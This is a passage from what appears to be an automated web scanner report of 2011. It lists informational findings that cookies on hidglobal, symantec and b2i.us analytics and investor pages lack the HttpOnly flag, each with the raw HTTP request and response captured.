The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hidprod/1/H.21/s88918623856734?AQB=1&ndh=1&t=14/1/2011%2012%3A29%3A13%201%20360&ce=ISO-8859-1&ns=hidglobal&pageName=hid%20global%20%3A%20home%20page&g=http%3A//www.hidglobal.com/&cc=USD&ch=hid%20global&server=www.hidglobal.com&c1=hid%20global%20%3A%20home%20page&c12=en_US&c17=hid%20global%20%3A%20home%20page&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: hidglobal.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_maitcx7Cibx7Cx7Ech=[CS]v4|26A62673051D24FA-40000102A01BFE08|4D4C4CE1[CE]; s_vi_mx7Eqqsvax7Edtx7Fvyyrx7Bx7Eydx7Esre=[CS]v4|26A6AAA485161A8B-40000177E007F5AA|4D4D5548[CE]; s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; s_vi_x60sqyabsqwx7Fx7Daax7Dfwaf=[CS]v4|26A6B50A85011110-6000010AA002E73C|4D4EC104[CE]; s_vi_jyx7Bskhyx7Bx7Dx7Ftwzytjyx7Bskhyx7Bx7D=[CS]v4|26A6B52B85011D42-6000010FC0072A22|4D4EC104[CE]; s_vi_nodx7Coxxzeyx7E=[CS]v4|26A833F885010134-6000010AE0007475|4D5067F0[CE]; s_vi_gcmjyhnlz=[CS]v4|26AA25EC8514A730-600001624037552A|4D544BD8[CE]; s_vi_sqrx7Cusqrx7Cufycyx7Fx7E=[CS]v4|26AA26BA85012683-6000011280000D78|4D544D74[CE]; s_vi_sratvux7Brax7Edx7Exxyxxgcxxyx7Bx7Eyr=[CS]v4|26AA26C30515B1AE-40000175804EFF04|4D544D85[CE]; s_vi_wuvxxqbx7Dgx7Dx7Bzx7Bdx60x7Bzxxx7Dzq=[CS]v4|26AA26C305161C98-40000182C041C1D0|4D544D84[CE]; s_vi_sqrx7Cux7Fx60dyx7Dex7Dx3Esx7Fx7D=[CS]v4|26AA26C38501378B-40000114C0001B4D|4D544D86[CE]; s_vi_mgidmfehkf=[CS]v4|26AA9D92050107A1-60000117601CE03B|4D553B1E[CE]; s_vi_lfhcnx7Dydgnx7F=[CS]v4|26AA9D92050107A1-60000117601CE03D|4D553B1E[CE]; s_vi_pogkrp=[CS]v4|26AB59298515A8B9-6000017620049527|4D56B252[CE]; s_vi_bx7Bhx7Fx7Eybnfx23nbx60=[CS]v4|26AB590A05160266-400001A200545AB5|4D56CCE1[CE]; s_vi_x7Ecgozoezfo=[CS]v4|26AB71BE851D19E9-60000138C021A2D1|4D56E37B[CE]; s_vi_nyhylx7B8x3Bx3B=[CS]v4|26AC43788516324D-600001A400020945|4D5944E6[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26AC43788516324D-600001A400020947|4D5944E6[CE]; s_vi_pnibdhj=[CS]v4|26ABF17985012549-60000104000DD48F|4D59634A[CE]; s_vi_nox7Cx7Dcdoieg=[CS]v4|26ACB1AB05011CD0-60000105603C7C3D|4D596354[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 18:29:01 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26ACBA36851D0187-400001024074FEAA[CE]; Expires=Sat, 13 Feb 2016 18:29:01 GMT; Domain=hidglobal.122.2o7.net; Path=/
Location: http://hidglobal.122.2o7.net/b/ss/hidprod/1/H.21/s88918623856734?AQB=1&pccr=true&vidn=26ACBA36851D0187-400001024074FEAA&&ndh=1&t=14/1/2011%2012%3A29%3A13%201%20360&ce=ISO-8859-1&ns=hidglobal&pageName=hid%20global%20%3A%20home%20page&g=http%3A//www.hidglobal.com/&cc=USD&ch=hid%20global&server=www.hidglobal.com&c1=hid%20global%20%3A%20home%20page&c12=en_US&c17=hid%20global%20%3A%20home%20page&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 13 Feb 2011 18:29:01 GMT
Last-Modified: Tue, 15 Feb 2011 18:29:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www18
Content-Length: 0
Content-Type: text/plain


11.14. http://metrics.hidglobal.com/b/ss/hidprod/1/H.19.4/s85479820847976  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.hidglobal.com
Path:   /b/ss/hidprod/1/H.19.4/s85479820847976

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hidprod/1/H.19.4/s85479820847976?AQB=1&ndh=1&t=14/1/2011%2012%3A29%3A55%201%20360&vmt=4A560CED&ns=hidglobal&pageName=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&g=http%3A//www.hidglobal.com/page.php%3Fpage_id%3D223&r=http%3A//www.hidglobal.com/&cc=USD&ch=hid%20global&c1=hid%20global%20%3A%20landing%20page&c2=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&v3=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&v8=en_US&c12=en_US&c17=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/page.php?page_id=223
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 18:29:42 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26ACBA4B051D14D4-4000010380005785[CE]; Expires=Sat, 13 Feb 2016 18:29:42 GMT; Domain=.hidglobal.com; Path=/
Location: http://metrics.hidglobal.com/b/ss/hidprod/1/H.19.4/s85479820847976?AQB=1&pccr=true&vidn=26ACBA4B051D14D4-4000010380005785&&ndh=1&t=14/1/2011%2012%3A29%3A55%201%20360&vmt=4A560CED&ns=hidglobal&pageName=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&g=http%3A//www.hidglobal.com/page.php%3Fpage_id%3D223&r=http%3A//www.hidglobal.com/&cc=USD&ch=hid%20global&c1=hid%20global%20%3A%20landing%20page&c2=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&v3=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&v8=en_US&c12=en_US&c17=hid%20global%20%3A%20landing%20page%20%3A%20customer%20support&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 13 Feb 2011 18:29:42 GMT
Last-Modified: Tue, 15 Feb 2011 18:29:42 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www28
Content-Length: 0
Content-Type: text/plain


11.15. http://om.symantec.com/b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://om.symantec.com
Path:   /b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833?AQB=1&ndh=1&t=14%2F1%2F2011%2013%3A3%3A41%201%20360&ce=UTF-8&pageName=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&g=http%3A%2F%2Fwww.symantec.com%2Fconnect%2Fblogs%2Fupdated-w32stuxnet-dossier-available&cc=USD&ch=Business%3A%20Connect&server=symantec&events=event69&c2=us&c3=en&c7=1017241&v7=1017241&c18=connect_utility%3A%20blogs&v18=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&c27=Business&v27=us&v28=en&v29=Business%3A%20Connect&c30=0&v32=0&c33=http%3A%2F%2Fwww.symantec.com%2Fconnect%2Fblogs%2Fupdated-w32stuxnet-dossier-available&v33=connect_utility%3A%20blogs&c35=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&c41=Connect&v41=Connect&c42=Endpoint%20Protection%20(AntiVirus)&v42=Endpoint%20Protection%20(AntiVirus)&c46=html&c47=page&c48=Updated%20W32.Stuxnet%20Dossier%20is%20Available&v48=Security&c49=Security&v49=Updated%20W32.Stuxnet%20Dossier%20is%20Available&v50=Business&c54=Connect&v54=Connect&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 19:03:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26ACBE3E85011833-40000100C034034F[CE]; Expires=Sat, 13 Feb 2016 19:03:25 GMT; Domain=.symantec.com; Path=/
Location: http://om.symantec.com/b/ss/veritasnonconsumer,veritasconnect/1/H.22.1/s81967138894833?AQB=1&pccr=true&vidn=26ACBE3E85011833-40000100C034034F&&ndh=1&t=14%2F1%2F2011%2013%3A3%3A41%201%20360&ce=UTF-8&pageName=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&g=http%3A%2F%2Fwww.symantec.com%2Fconnect%2Fblogs%2Fupdated-w32stuxnet-dossier-available&cc=USD&ch=Business%3A%20Connect&server=symantec&events=event69&c2=us&c3=en&c7=1017241&v7=1017241&c18=connect_utility%3A%20blogs&v18=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&c27=Business&v27=us&v28=en&v29=Business%3A%20Connect&c30=0&v32=0&c33=http%3A%2F%2Fwww.symantec.com%2Fconnect%2Fblogs%2Fupdated-w32stuxnet-dossier-available&v33=connect_utility%3A%20blogs&c35=en%2Fus%3A%20biz%3A%20connect%3A%20security%3A%20blogs%3A%20updated%20w32.stuxnet%20dossier%20is%20available&c41=Connect&v41=Connect&c42=Endpoint%20Protection%20(AntiVirus)&v42=Endpoint%20Protection%20(AntiVirus)&c46=html&c47=page&c48=Updated%20W32.Stuxnet%20Dossier%20is%20Available&v48=Security&c49=Security&v49=Updated%20W32.Stuxnet%20Dossier%20is%20Available&v50=Business&c54=Connect&v54=Connect&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1113&bh=1010&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 13 Feb 2011 19:03:25 GMT
Last-Modified: Tue, 15 Feb 2011 19:03:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www6
Content-Length: 0
Content-Type: text/plain


11.16. http://www.b2i.us/blank.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /blank.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blank.htm HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 142
Content-Type: text/html
Last-Modified: Tue, 13 Apr 2004 13:26:29 GMT
Accept-Ranges: none
ETag: "607afded5a21c41:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:10 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Untitled</title>
</head>
<body>
</body>
</html>

11.17. http://www.b2i.us/profiles/images/directory_minus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/images/directory_minus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/images/directory_minus.gif HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 338
Content-Type: image/gif
Last-Modified: Thu, 09 Nov 2006 18:24:27 GMT
Accept-Ranges: none
ETag: "9e84674a2c4c71:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:13 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

GIF89a........................................"""......................................................            ......!!!...............###..................$$$...........................................
...[SNIP]...

11.18. http://www.b2i.us/profiles/images/directory_plus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/images/directory_plus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/images/directory_plus.gif HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 344
Content-Type: image/gif
Last-Modified: Thu, 09 Nov 2006 18:24:27 GMT
Accept-Ranges: none
ETag: "9e84674a2c4c71:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:13 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

GIF89a..........!!!.................................................................."""............ ...................................................###...........................................
...[SNIP]...

11.19. http://www.b2i.us/profiles/images/redx.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/images/redx.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/images/redx.jpg HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 1068
Content-Type: image/jpeg
Last-Modified: Thu, 25 Mar 2010 21:47:53 GMT
Accept-Ranges: none
ETag: "8ab0ccd264ccca1:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:12 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

......JFIF.....`.`.....fExif..II*...............>...........F...(...........1.......N.......`.......`.......Paint.NET v3.36....C...............    .        ..    .
...........!........'.."#%%%..),($+!$%$...C...
...[SNIP]...

11.20. http://www.b2i.us/profiles/images/reload.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/images/reload.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/images/reload.gif HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/contactus.asp?f=1&BzID=1475&to=cm&Nav=0&LangID=1&s=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; cNav1475=0; cSite1475=0; cLang1475=1; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 1170
Content-Type: image/gif
Last-Modified: Wed, 09 Jul 2008 18:43:48 GMT
Accept-Ranges: none
ETag: "f4997cb9f3e1c81:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:38 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

GIF89a.......000.........666..................SSS..............................DDD.........JJJ.........QQQ.....................NNN......>>>]]].....................qqqjjj...\\\............rrr........./
...[SNIP]...

11.21. http://www.b2i.us/profiles/images/speaker.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/images/speaker.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/images/speaker.gif HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/contactus.asp?f=1&BzID=1475&to=cm&Nav=0&LangID=1&s=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; cNav1475=0; cSite1475=0; cLang1475=1; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 1191
Content-Type: image/gif
Last-Modified: Wed, 09 Jul 2008 18:43:49 GMT
Accept-Ranges: none
ETag: "accc31baf3e1c81:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:38 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

GIF89a.......000.......................................lll..............................SSS............EEE...............kkk...888...[[[...........................]]]......vvv......|||.............
...[SNIP]...

11.22. http://www.b2i.us/profiles/inc/BotDetectScript.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/inc/BotDetectScript.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/inc/BotDetectScript.js HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/contactus.asp?f=1&BzID=1475&to=cm&Nav=0&LangID=1&s=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; cNav1475=0; cSite1475=0; cLang1475=1; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 2153
Content-Type: application/x-javascript
Last-Modified: Wed, 09 Jul 2008 18:44:02 GMT
Accept-Ranges: none
ETag: "24c2c1c1f3e1c81:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:30 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

function LBD_LoadSound(soundPlaceholderId, soundLink) {
if(document.getElementById) {
var i = soundLink.indexOf('&d=');
if (-1 != i) {
soundLink = soundLink.substring(0, i);
}
...[SNIP]...

11.23. http://www.b2i.us/profiles/inc/FormStyle.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/inc/FormStyle.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/inc/FormStyle.css HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/contactus.asp?f=1&BzID=1475&to=cm&Nav=0&LangID=1&s=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; cNav1475=0; cSite1475=0; cLang1475=1; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 921
Content-Type: text/css
Last-Modified: Wed, 09 Jul 2008 18:40:39 GMT
Accept-Ranges: none
ETag: "ea2de648f3e1c81:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:30 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/


#CodeIncorrectLabel {
color: Red;
}

#CodeCorrectLabel {
color: Green;
}

#Note {
padding: 0;
margin: 11px;
margin-bottom: -7px;
width: 320px;
font-size: 0.8em;
color:
...[SNIP]...

11.24. http://www.b2i.us/profiles/inc/InvCSS.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/inc/InvCSS.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/inc/InvCSS.asp?b=1475&l=1&s=0 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
